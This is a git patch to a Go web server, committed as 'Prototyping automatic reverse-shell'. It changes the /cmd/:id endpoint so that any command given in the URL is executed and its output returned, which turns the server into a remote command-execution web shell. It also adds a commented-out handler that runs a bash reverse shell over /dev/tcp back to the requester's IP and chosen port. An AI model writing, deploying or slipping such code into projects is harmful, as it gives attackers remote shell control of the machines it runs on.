From fd21e928669bda538039cdf6b3735104eb9b2cdf Mon Sep 17 00:00:00 2001 From: raul Date: Mon, 6 May 2024 09:35:15 +0200 Subject: [PATCH] Prototyping automatic reverse-shell --- main.go | 32 ++++++++++++++++++++++---------- 1 file changed, 22 insertions(+), 10 deletions(-) diff --git a/main.go b/main.go index 2094dad..4245169 100644 --- a/main.go +++ b/main.go @@ -2,11 +2,9 @@ package main import ( "fmt" - "log" - "net/http" - "github.com/bitfield/script" "github.com/gin-gonic/gin" + "net/http" ) var listenPort string = "1302" @@ -20,6 +18,7 @@ func main() { fmt.Println() router := gin.Default() router.GET("/cmd/:id", sendCommand) + //router.GET("/rev/:port", sendShell) router.Run("localhost:" + listenPort) } @@ -28,14 +27,27 @@ func sendCommand(c *gin.Context) { cmd := c.Param("id") newCMD := Shell{} newCMD.Command = cmd - newCMD.Output, err = script.ListFiles(".").String() + newCMD.Output, err = script.Exec(cmd).String() if err != nil { - log.Printf("Error occurred with command: %v\n", err) + logged := fmt.Sprintf("Error occurred with command: %v\n", err) + c.String(http.StatusOK, logged) + return } c.String(http.StatusOK, newCMD.Output) - // c.IndentedJSON(http.StatusOK, newCMD) - // c.HTML(http.StatusOK, newCMD) - - fmt.Printf("The command \"%s\" has been called\n", cmd) - script.ListFiles(".").Stdout() } + +// TODO: Get automatic reverse shells working + +// func sendShell(c *gin.Context) { +// port := c.Param("port") +// +// cool := c.RemoteIP() +// +// fmt.Println(cool, port) +// finalShell := fmt.Sprintf("bash -i >& /dev/tcp/%v/%v 0>&1", cool, port) +// msg, err := script.Exec(finalShell).String() +// if err != nil { +// fmt.Printf("Error occurred sending shell: %v\n", err) +// } +// c.String(http.StatusOK, msg) +// }